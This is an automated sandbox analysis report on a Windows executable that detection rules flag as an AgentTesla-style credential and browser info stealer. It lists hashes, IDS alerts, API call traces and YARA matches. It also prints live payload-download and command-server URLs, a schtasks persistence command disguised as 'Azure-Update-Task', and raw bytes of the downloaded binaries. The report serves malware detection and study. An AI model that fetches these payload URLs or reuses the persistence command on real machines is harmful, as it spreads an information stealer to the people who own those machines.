Summary | ZeroBOX

build.exe

AgentTesla info stealer browser Malicious Library DGA PWS ScreenShot Internet API DNS Http API Socket AntiDebug PE File OS Processor Check PE32 AntiVM
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 28, 2021, 1:45 p.m. Sept. 28, 2021, 1:58 p.m.
Size 804.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 6bacb42179eb54d6afac2664cd0227d7
SHA256 d87865909f5bfd462d0f0a5110e0bb7c9a1a177ece1cb90c9755263a285949d9
CRC32 6EFE8E7C
ssdeep 24576:QN5sQXdZD4UjBEk/xf3P86KgVNgE5p4sJXuO:QPdZDxBLn86KAbhJ
PDB Path C:\nigupitufo.pdb
Yara
  • PE_Header_Zero - PE File Signature
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Library_Zero - Malicious_Library
  • IsPE32 - (no description)

Suricata Alerts

Flow SID Signature Category
TCP 77.123.139.190:443 -> 192.168.56.101:49205 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
UDP 192.168.56.101:61479 -> 164.124.101.2:53 2027026 ET POLICY External IP Address Lookup DNS Query (2ip .ua) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49213 -> 77.123.139.190:443 2033214 ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49213 -> 77.123.139.190:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49203 -> 77.123.139.190:443 2033214 ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49203 -> 77.123.139.190:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49213 -> 77.123.139.190:443 2033214 ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49203 -> 77.123.139.190:443 2033214 ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 77.123.139.190:443 2033214 ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 77.123.139.190:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49204 -> 77.123.139.190:443 2033214 ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI) Potentially Bad Traffic
UDP 192.168.56.101:59369 -> 164.124.101.2:53 2023883 ET DNS Query to a *.top domain - Likely Hostile Potentially Bad Traffic
TCP 77.123.139.190:443 -> 192.168.56.101:49215 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 88.99.75.82:443 -> 192.168.56.101:49229 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49214 -> 77.123.139.190:443 2033214 ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49214 -> 77.123.139.190:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49218 -> 211.119.84.112:80 2002400 ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer) A Network Trojan was detected
TCP 192.168.56.101:49218 -> 211.119.84.112:80 2020826 ET MALWARE Potential Dridex.Maldoc Minimal Executable Request A Network Trojan was detected
TCP 192.168.56.101:49214 -> 77.123.139.190:443 2033214 ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49218 -> 211.119.84.112:80 2022896 ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 A Network Trojan was detected
TCP 192.168.56.101:49218 -> 211.119.84.112:80 2023882 ET INFO HTTP Request to a *.top domain Potentially Bad Traffic
TCP 192.168.56.101:49219 -> 179.52.22.168:80 2002400 ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer) A Network Trojan was detected
TCP 192.168.56.101:49219 -> 179.52.22.168:80 2020826 ET MALWARE Potential Dridex.Maldoc Minimal Executable Request A Network Trojan was detected
TCP 211.119.84.112:80 -> 192.168.56.101:49218 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 211.119.84.112:80 -> 192.168.56.101:49218 2023464 ET HUNTING Possible EXE Download From Suspicious TLD Misc activity
TCP 179.52.22.168:80 -> 192.168.56.101:49219 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.101:49228 -> 88.99.75.82:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
UDP 192.168.56.101:55450 -> 8.8.8.8:53 2027757 ET DNS Query for .to TLD Potentially Bad Traffic
TCP 192.168.56.101:49225 -> 88.99.75.82:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49214 -> 77.123.139.190:443 2033214 ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49203 -> 77.123.139.190:443 2033214 ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 77.123.139.190:443 2033214 ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49213 -> 77.123.139.190:443 2033214 ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI) Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "Azure-Update-Task" has successfully been created.
console_handle: 0x00000007
1 1 0
pdb_path C:\nigupitufo.pdb
resource name AFX_DIALOG_LAYOUT
resource name PAMIFEGIHURULUFUKIYUVUWOGULOJOK
resource name None
Time & API Arguments Status Return Repeated

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: 8a 08 40 3a cb 75 f9 2b c2 50 56 b9 5c 10 4d 00
exception.symbol: build2+0x106e0
exception.instruction: mov cl, byte ptr [eax]
exception.module: build2.exe
exception.exception_code: 0xc0000005
exception.offset: 67296
exception.address: 0x4106e0
registers.esp: 1637032
registers.edi: 0
registers.eax: 0
registers.ebp: 16
registers.edx: 1
registers.ebx: 0
registers.esi: 0
registers.ecx: 1637060
1 0 0
request GET http://securebiz.org/fhsgtsspen6/get.php?pid=CD20CF071BA7C05D5F5E6CAF42496E78&first=true
request GET http://znpst.top/dl/build2.exe
request GET http://securebiz.org/files/1/build3.exe
domain znpst.top description Generic top level domain TLD
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2428
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 593920
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04480000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2428
region_size: 1159168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04520000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 593920
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c20000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1760
region_size: 1159168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04550000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2420
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72732000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 503808
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02cda000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2620
region_size: 868352
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02dc0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2076
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 65536
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0338e000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2076
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
name AFX_DIALOG_LAYOUT language LANG_MONGOLIAN filetype data sublanguage SUBLANG_DEFAULT offset 0x027fffe8 size 0x00000002
name PAMIFEGIHURULUFUKIYUVUWOGULOJOK language LANG_MONGOLIAN filetype ASCII text, with very long lines, with no line terminators sublanguage SUBLANG_DEFAULT offset 0x027ff860 size 0x000006f0
name RT_ACCELERATOR language LANG_MONGOLIAN filetype data sublanguage SUBLANG_DEFAULT offset 0x027fff50 size 0x00000078
name RT_VERSION language LANG_MONGOLIAN filetype data sublanguage SUBLANG_DEFAULT offset 0x027ffff0 size 0x00000130
name None language LANG_MONGOLIAN filetype data sublanguage SUBLANG_DEFAULT offset 0x027fffd8 size 0x0000000a
name None language LANG_MONGOLIAN filetype data sublanguage SUBLANG_DEFAULT offset 0x027fffd8 size 0x0000000a
file C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build3.exe
file C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build2.exe
file C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build2.exe
file C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build3.exe
file C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build3.exe
file C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build2.exe
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2764
thread_handle: 0x000000ac
process_identifier: 3020
current_directory:
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe"
filepath_r: C:\Windows\System32\schtasks.exe
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x000000b0
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@ິ Í!¸LÍ!This program cannot be run in DOS mode. $*¾8(nßV{nßV{nßV{©ý{EßV{©È{~ßV{©ü{ ßV{g§Å{kßV{nßW{ßV{©ù{oßV{©Ì{oßV{©Ë{oßV{RichnßV{PEL~p_à  ŠÔ}` @ ñp €¬<@~HE~0 ¢À@ Ì.text«ˆŠ `.rdata.‚ „Ž@@.data|0¾@À.rsrcHE@~FÐ @@.reloc4~ @B‹ÿU‹ìQ‹E P‹MQÿà A…Àu ÿh A‰EüëÇEüƒ}üt‹UüRè§ ƒÄƒÈÿë3À‹å]ÃÌÌÌÌÌÌÌÌ̋ÿU‹ìjþhBhð"@d¡PƒÄôSVW¡x1B1Eø3ÅPEðd£èYÇEü‹EPè9ƒÄ‰EäÇEüþÿÿÿèëèPËEä‹Mðd‰ Y_^[‹å]ÃÌÌÌÌÌÌÌÌÌ̋ÿU‹ìƒì¡è.¾Pÿè A‰Eø‹ ä.¾Qÿè A‰Eð‹Uð;Uør‹Eð+EøƒÀƒøs3Àéùj‹MøQè¡%ƒÄ‰Eô‹Uð+UøƒÂ9Uôƒ¬}ôs‹Eô‰EèëÇEè‹MôMè‰Mì‹Uì;Uôr"j}h<¢Aj‹EìP‹MøQèJƒÄ‰Eüƒ}üu:‹UôƒÂ‰Uì‹Eì;Eôr%h„h<¢Aj‹MìQ‹UøRèƒÄ‰Eüƒ}üu3ÀëQ‹Eð+EøÁø‹Mü‰Uð‹Eü‰Eø‹MøQÿä A£è.¾‹URÿä A‹Mð‰‹UðƒÂ‰Uð‹EðPÿä A£ä.¾‹E‹å]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌ̋ÿU‹ì‹EPè"þÿÿƒÄ÷ØÀ÷؃è]ÃÌÌÌ̋ÿU‹ìQhÌh<¢Ajjj èƒÄ‰Eü‹EüPÿä A£è.¾‹ è.¾‰ ä.¾ƒ}üu¸ë ‹UüÇ3À‹å]ÃÌÌÌÌÌÌÌ̋ÿU‹ìƒìDÇEØ3À‰E܉Eà‰Eä‰Eè‰Eì‰Eð‰EôM؉Mø3҃}•Â‰Uԃ}Ôu!h<£Ajh‚hØ¢AjèÚ9ƒÄƒøũ}Ôu1è† Çjh‚hØ¢Ah´¢Ah<£AèÅ7ƒÄƒÈÿ鸃}tƒ} u ÇEÌëÇEÌ‹M̉MЃ}Ðu!hp¢Ajh…hØ¢AjèZ9ƒÄƒøũ}Ðu1è Çjh…hØ¢Ah´¢Ahp¢AèE7ƒÄƒÈÿé8‹EøÇ@ B‹Mø‹U ‰Q‹Eø‹M ‰}ÿÿÿ?v ‹UøÇBÿÿÿë ‹EÑà‹Mø‰A‹UR‹EP‹MQ‹UøRÿUƒÄ‰Eüƒ} u‹Eüéփ}üŒ¬‹Eø‹Hƒé‰MȋUø‹EȉBƒ}È|!‹Mø‹Æ3À%ÿ‰EċMø‹ƒÂ‹Eø‰ë‹MøQjè·3ƒÄ‰Eă}ÄÿtY‹Uø‹Bƒè‰EÀ‹Mø‹UÀ‰Qƒ}À|"‹Eø‹Æ3ҁâÿ‰U¼‹Eø‹ƒÁ‹Uø‰ ë‹EøPjèc3ƒÄ‰E¼ƒ}¼ÿt‹Eüë 3ɋU‹E f‰LPþ‹Møƒy}¸þÿÿÿëƒÈÿ‹å]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌ̋ÿU‹ìƒì‹EP‹MQ‹UR‹E P‹MQhpQ@èzýÿÿƒÄ‰Eüƒ}ü} ÇEøÿÿÿÿë‹Uü‰Uø‹Eø‹å]ÃÌÌÌÌÌÌÌ̋ÿU‹ìƒì,ÇEüÿÿÿÿÇEø3Àƒ}•À‰Eôƒ}ôu!hÔ£Ajh9hØ¢Ajè@7ƒÄƒøũ}ôu1èìÇjh9hØ¢Ahô£AhÔ£Aè+5ƒÄƒÈÿé&ƒ}uƒ}u ƒ} u3Àé ƒ}tƒ} v ÇEèëÇEè‹Uè‰Uðƒ}ðu!h£Ajh?hØ¢Ajè§6ƒÄƒøũ}ðu1èSÇjh?hØ¢Ahô£Ah£Aè’4ƒÄƒÈÿ鍋M ;M†½è‹‰Uø‹EP‹MQ‹UR‹EƒÀP‹MQhpc@èüÿÿƒÄ‰Eüƒ}üþ…€ƒ} ÿt^} ÿÿÿtU‹UƒÂ;U sJ‹EƒÀ‹M +È9 „1Bs ‹„1B‰Uäë‹EƒÀ‹M +ȉMä‹UäÑâRhþ‹E‹MTARèßKƒÄ èwƒ8"u èm‹Mø‰ƒÈÿéÆëcèY‹‰Uø‹EP‹MQ‹UR‹E P‹MQhpc@èFûÿÿƒÄ‰Eü3ҋE ‹Mf‰TAþƒ}üþu"ƒ}ÿuèƒ8"u è‹Uø‰ƒÈÿéaƒ}üÛ3À‹Mf‰ƒ} ÿtJ} ÿÿÿtAƒ} v;‹U ƒê9„1Bs ¡„1B‰Eàë ‹M ƒé‰Mà‹UàÑâRhþ‹EƒÀPèüJƒÄ ƒ}üþux3Ét ÇEÜëÇE܋U܉Uìƒ}ìu!h`£AjhfhØ¢Ajè›4ƒÄƒøũ}ìu1èGÇ"jhfhØ¢Ahô£Ah`£Aè†2ƒÄƒÈÿ遃Èÿë|ƒ} ÿt^} ÿÿÿtU‹MüƒÁ;M sJ‹UüƒÂ‹E +Â9„1Bs ‹ „1B‰MØë‹UüƒÂ‹E +‰E؋MØÑáQhþ‹Uü‹ELPQèJƒÄ ƒ}ü} ÇEÔÿÿÿÿë‹Uü‰UԋEԋå]ÃÌÌÌÌÌ̋ÿU‹ì‹EPj‹MQ‹UR‹E P‹MQè0üÿÿƒÄ]ÃÌÌÌÌÌÌÌÌÌÌ̋ÿU‹ìQjjj‹E P‹MQèwƒÄ‰Eü‹Eü‹å]ÃÌÌÌÌÌÌÌÌÌ̋ÿU‹ìèF]è]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌ̋ÿU‹ìjþh°Bhð"@d¡PƒÄ˜SVW¡x1B1Eø3ÅPEðd£‰eèÇEE Pÿð Aƒ=ü.¾ujjjjÿì A莉E”èvs…Àu jèKƒÄèÓl…Àu jè8ƒÄjèÞ-ƒÄèækÇEüèÊg…À} jè߃Äÿ4 A£ø.¾è¬f£ëIèb…À} jè·ƒÄè_`…À} j 褃ÄjèzƒÄ‰Eœƒ}œt ‹MœQè…ƒÄè]_‰E˜‹Ũât ·EЉEˆëÇEˆ ‹MˆQ‹U˜Rjh@èþx‰Eƒ}”u ‹EPè¼è÷ÇEüþÿÿÿë?‹Mì‹‹‰EŒ‹MìQ‹UŒRè—\ƒÄËeè‹EŒ‰Eƒ}”u ‹MQè›èÖÇEüþÿÿÿ‹E‹Mðd‰ Y_^[‹å]ÃÌÌÌÌÌÌÌÌÌ̋ÿU‹ìƒ=ëIuèMr‹EPèärƒÄhÿèWƒÄ]ÃÌ̋ÿU‹ìƒìÇEü@‹Eü·ùMZt3ÀëI‹Uü‹EüB<‰Eø‹Mø9PEt3Àë.‹Uø·B= t3Àë‹Møƒytw3Àë‹Uø3Àƒºè•À‹å]ÃÌ̋ÿU‹ìVèՋM‰‹URèƒÄ‹ðè
request_handle: 0x00cc0010
1 1 0

InternetReadFile

buffer: MZÿÿ¸@ິ Í!¸LÍ!This program cannot be run in DOS mode. $0a5Xt[ t[ t[ jRÎ a[ jRØ [ jRß L[ SÆ s[ tZ å[ jRÑ u[ jRÏ u[ jRÊ u[ Richt[ PEL7ÉÚ^à  ú¬âÀ@ðäâU`•P@ãðV ã4`Œ@.textpùú `.rdataš‘’þ@@.data8Œà°@À.rsrcðV@ãX¢@@.reloc”@ ãBú@B‹ÿU‹ìQ‹E P‹MQÿ B…Àu ÿB‰EüëÇEüƒ}üt‹UüRèg3ƒÄƒÈÿë3À‹å]ÃÌÌÌÌÌÌÌÌ̋ÿU‹ìQ‰Mü‹MüèO‹Eƒàt ‹MüQè~ƒÄ‹Eü‹å]ÂÌ̋ÿU‹ìƒì‰Mø‹EøǔB‹Mƒ9tJ‹U‹Pèé6ƒÄƒÀ‰Eü‹MüQèwƒÄ‹Uø‰B‹Eøƒxt‹M‹R‹EüP‹Mø‹QRèÏ3ƒÄ ë ‹EøÇ@‹MøÇA‹Eø‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌ̋ÿU‹ìƒì‰Mø‹EøǔB‹Mø‹U‹B‰A‹Møƒyta‹UƒztL‹E‹HQèB6ƒÄƒÀ‰Eü‹UüRèЃÄ‹Mø‰A‹Uøƒzt‹E‹HQ‹UüR‹Eø‹HQè'3ƒÄ ë ‹UøÇBë ‹Eø‹M‹Q‰P‹Eø‹å]Â̋ÿU‹ìQ‰Mü‹EüǔB‹Müƒyt‹Uü‹BPè9ƒÄ‹å]ÃÌ̋ÿU‹ìQ‰Mü‹Eüƒxt ‹Mü‹Aë븜B‹å]ÃÌÌÌÌÌÌÌÌÌÌ̋ÿU‹ìj‹EPè ƒÄ]ÃÌÌÌÌÌÌÌÌÌÌ̋ÿU‹ìQjjj¡¾CP‹MQ襃ĉEü‹Eü‹å]ÃÌÌÌÌÌÌÌ̋ÿU‹ìƒ=´¾Cuj‹EP‹M Q‹URh˜²Bè*ƒÄëëj‹EP‹M Q‹URjèƒÄ]ÃÌÌÌÌÌÌÌÌ̋ÿU‹ìjÿhÈBd¡PƒìlVW¡¨²B3ÅPEôd£‹EPMÐèëÇEüƒ}t‹M‹U ‰3Àƒ} •À‰EÀƒ}ÀuhxBjj^hBjè?@ƒÄƒøũ}ÀuNè1Çjj^hBhBhxBèM>ƒÄÇE´ÇE¸ÇEüÿÿÿÿMÐè=‹E´‹U¸é<ƒ}tƒ}|ƒ}$~ ÇE ëÇE ‹U ‰U¼ƒ}¼uh°Bjj_hBjèŸ?ƒÄƒøũ}¼uNè{0Çjj_hBhBh°Bè­=ƒÄÇE¬ÇE°ÇEüÿÿÿÿMÐ蝋E¬‹U°éœ‹M ‰MðÇEÄÇEȋUðŠˆEã‹MðƒÁ‰MðMÐè•…Àt0MÐ艋ƒº¬~MÐèvPj¶EãPèù;ƒÄ ‰Eœëj¶MãQMÐèRPè,;ƒÄ ‰Eœƒ}œt‹UðŠˆEã‹MðƒÁ‰Mð됾Uãƒú-u‹EƒÈ‰E‹MðŠˆUã‹EðƒÀ‰Eðë¾Mãƒù+u‹UðŠˆEã‹MðƒÁ‰Mðƒ}u8¾Uãƒú0t ÇE ë&‹Eð¾ƒùxt ‹Uð¾ƒøXu ÇEëÇEƒ}u9¾Mãƒù0u0‹Uð¾ƒøxt ‹Mð¾ƒúXu‹EðƒÀ‰Eð‹MðŠˆUã‹EðƒÀ‰Eð‹E™RPjÿjÿè²G‰Eä‰Uèj¶MãQMÐèMPè':ƒÄ …Àt ¾Uãƒê0‰UìëTh¶EãPMÐè"Pèü9ƒÄ …Àt0¾Mãƒùa|¾Uãƒúz ¾Eãƒè ‰E˜ë¾Mã‰M˜‹U˜ƒê7‰Uìë鵋Eì;Er騋MƒÉ‰M‹UÈ;UèrLw‹EÄ;EärB‹MÄ;Mäu^‹UÈ;UèuV‹uì3ÿ‹E™RPjÿjÿèdF‰u‰}”‰Eˆ‰UŒ‹E”;EŒw.r‹M;Mˆw$‹E™RP‹UÈR‹EÄPèóE‹Mì3öÁ։EĉUÈë‹UƒÊ‰Uƒ}uë‹EðŠˆMã‹UðƒÂ‰UðéÏþÿÿ‹Eðƒè‰Eð‹Mƒáuƒ}t‹U ‰UðÇEÄÇEÈ鋋Eƒàu:‹Mƒáu{‹Uƒât}Ȁw!rƒ}Äw‹EƒàuZ}ÈÿÿÿrQwƒ}ÄÿvIè$-Ç"‹MƒátÇEÄÿÿÿÿÇEÈÿÿÿÿë&‹UƒâtÇEÄÇEȀëÇEÄÿÿÿÿÇEÈÿÿÿƒ}t‹E‹Mð‰‹Uƒât‹EÄ÷؋MȃÑ÷ىEĉMȋUĉU¤‹EȉE¨ÇEüÿÿÿÿMÐèü‹E¤‹U¨‹Môd‰ Y_^‹å]ÃÌÌÌÌ̋ÿU‹ìQ‰Mü‹EüÆ@ ƒ}…¦èY‹Mü‰A‹Uü‹B‹Mü‹Pl‰‹Eü‹H‹Uü‹Ah‰B‹Mü‹;²Bt‹Eü‹H‹Qp#зBu è5‹Mü‰‹Uü‹B;ضBt‹Mü‹Q‹Bp#зBu èBE‹Mü‰A‹Uü‹B‹Hpƒáu‹Uü‹B‹HpƒÉ‹Uü‹B‰Hp‹MüÆA ë‹U‹‹J‹Uü‰‰J‹Eü‹å]ÂÌÌÌÌÌÌ̋ÿU‹ìQ‰Mü‹Eü¶H …Ét‹Uü‹B‹Hpƒáý‹Uü‹B‰Hp‹å]ÃÌÌ̋ÿU‹ìQ‰Mü‹Eü‹å]ËÿU‹ìjþhŽBh@v@d¡PƒÄôSVW¡¨²B1Eø3ÅPEðd£ƒ}ué˜jè¬\ƒÄÇEü‹Eƒè ‰Eä‹Mä‹QâÿÿƒútA‹Eäƒxt8‹Mä‹Qâÿÿƒút'‹EäƒxthBjj4h˜BjèÐ9ƒÄƒøűUä‹BP‹MQè—ƒÄÇEüþÿÿÿèë jè_\ƒÄËMðd‰ Y_^[‹å]ÃÌÌÌÌÌÌÌÌ̋ÿU‹ìƒìD‹E PMØèÜýÿÿ3Ƀ}•Á‰Mԃ}ÔuhxBjj7h`BjèE9ƒÄƒøũ}Ôu;è!*Çjj7h`BhPBhxBèS7ƒÄÙîÝ]ȍMØèSþÿÿÝEÈ駍MØèsþÿÿ…Àt2MØègþÿÿ‹ƒ¸¬~MØèTþÿÿPj‹M¶RèÕ5ƒÄ ‰E¼ëj‹E¶QMØè,þÿÿPè5ƒÄ ‰E¼ƒ}¼t ‹UƒÂ‰U딍MØèþÿÿPjj‹EPè©,ƒÄP‹MQUèRèh]ƒÄÝ@Ý]ÀMØè§ýÿÿÝEÀ‹å]ËÿU‹ìj‹EPèÀþÿÿƒÄ]ÃÌÌÌÌÌÌÌÌÌÌ̋ÿU‹ìQ‰Mü‹EüÇÀB‹MüQèUoƒÄ‹å]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌ̋ÿU‹ìQ‰Mü‹Müè¿ÿÿÿ‹Eƒàt ‹MüQènýÿÿƒÄ‹Eü‹å]ÂÌ̋ÿU‹ìQ‰Mü‹EüƒÀ P‹MƒÁ QèpƒÄ÷ØÀƒÀ‹å]ÂÌÌÌ̋ÿU‹ìèqè]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌ̋ÿU‹ìjþh(ŽBh@v@d¡PƒÄ”SVW¡¨
request_handle: 0x00cc0010
1 1 0
section {u'size_of_data': u'0x00092600', u'virtual_address': u'0x00025000', u'entropy': 7.991525942094955, u'name': u'.data', u'virtual_size': u'0x027d7824'} entropy 7.99152594209 description A section with a high entropy has been found
entropy 0.729140722291 description Overall entropy of this PE file is high
url http://www.openssl.org/support/faq.html
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Win32 PWS Loki rule Win32_PWS_Loki_Zero
description Win.Trojan.agentTesla rule Win_Trojan_agentTesla_Zero
description Take ScreenShot rule ScreenShot
description browser info stealer rule infoStealer_browser_Zero
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Match Windows Inet API call rule Str_Win32_Internet_API
description Take ScreenShot rule ScreenShot
description Match Windows Http API call rule Str_Win32_Http_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Match Windows Inet API call rule Str_Win32_Internet_API
description Take ScreenShot rule ScreenShot
description Match Windows Http API call rule Str_Win32_Http_API
description (no description) rule DebuggerCheck__GlobalFlags
cmdline /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe"
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 1273856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000080
1 0 0

NtAllocateVirtualMemory

process_identifier: 2420
region_size: 1273856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000080
1 0 0

NtAllocateVirtualMemory

process_identifier: 1868
region_size: 880640
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000080
1 0 0

NtAllocateVirtualMemory

process_identifier: 2236
region_size: 24576
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
